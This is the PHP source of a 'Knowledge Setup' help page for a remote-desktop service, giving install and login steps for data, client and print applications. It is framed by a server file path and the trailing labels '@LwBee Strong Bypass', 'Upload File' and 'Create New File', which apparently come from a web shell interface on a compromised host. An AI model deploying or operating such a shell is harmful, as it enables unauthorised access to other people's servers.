/home3/vehiclea/public_html/mamacloud/knowledgeSetup.php
<?php
session_start();
$_SESSION['active'] = 'knowledgeSetup';
include 'header.php';
include 'sidelinks.php';
?>
<style type="text/css">
h3{
color: #0275d8;
}
ul{
padding-left: 40px;
}
ul li{
padding: 5px;
}
</style>
<div class="content-wrapper">
<div class="container-fluid">
<div class="row">
<div class="col-sm-12 p-0">
<div class="main-header">
<h4 style="color:#2567b3">KNOWLEDGE SETUP</h4>
<ol class="breadcrumb breadcrumb-title breadcrumb-arrow">
<li class="breadcrumb-item">
<a href="index.php">
<i class="icofont icofont-home"></i>
</a>
</li>
<li class="breadcrumb-item"><a href="#">Components</a></li>
<li class="breadcrumb-item"><a href="knowledgeSetup.php">Knowledge Setup</a></li>
</ol>
</div>
</div>
</div>
<div class="row">
<div class="col-lg-12">
<div class="card">
<div class="card-header">
<h5 class="card-header-text">Knowledge Setup</h5>
</div>
<div class="card-block">
<div class="container">
<h3>DATA APPLICATION</h3>
<ul style="list-style-type:square">
<li>Go to Download Setup</li>
<li>Click on Data Application Button</li>
<li>There a Software will be download</li>
<li>Open the downloaded file and install it</li>
<li>Enter Host Number, Username, Password and Port Number</li>
<li>It will automaically connected to our server</li>
</ul>
<br>
<h3>CLIENT APPLICATION</h3>
<ul style="list-style-type:square">
<li>Go to Download Setup</li>
<li>Click on Client Application Button</li>
<li>There a Software will be download</li>
<li>Open the downloaded file and install it</li>
<li>after your installation an MSTCS application will be open</li>
<li>Enter Username, Password</li>
<li>It will automaically connected to our server</li>
</ul>
<br>
<h3>PRINT APPLICATION</h3>
<ul style="list-style-type:square">
<li>Go to Download Setup</li>
<li>Click on Client Application Button</li>
<li>There a Software will be download</li>
<li>Open the downloaded file and install it</li>
<li>after your installation an MSTCS application will be open</li>
<li>Enter Username, Password</li>
<li>It will automaically connected to our server</li>
</ul>
</div>
<!-- <div class="col-lg-4">
<a href="downloadSoftware/FileZilla_3.51.0_win64-setup.exe" class="btn btn-primary btn-lg" >DATA APPLICATION</a>
</div>
<div class="col-lg-4">
<a href="downloadSoftware/Setup-ConnectionClient.exe" class="btn btn-primary btn-lg" >CLIENT APPLICATION</a>
</div>
<div class="col-lg-4">
<a href="downloadSoftware/TSPrint_client.exe" class="btn btn-primary btn-lg" >PRINT APPLICATION</a>
</div> -->
</div>
</div>
</div>
</div>
</div>
</div>
<?php include 'footer.php' ?>
@LwBee Strong Bypass
Upload File
Create New File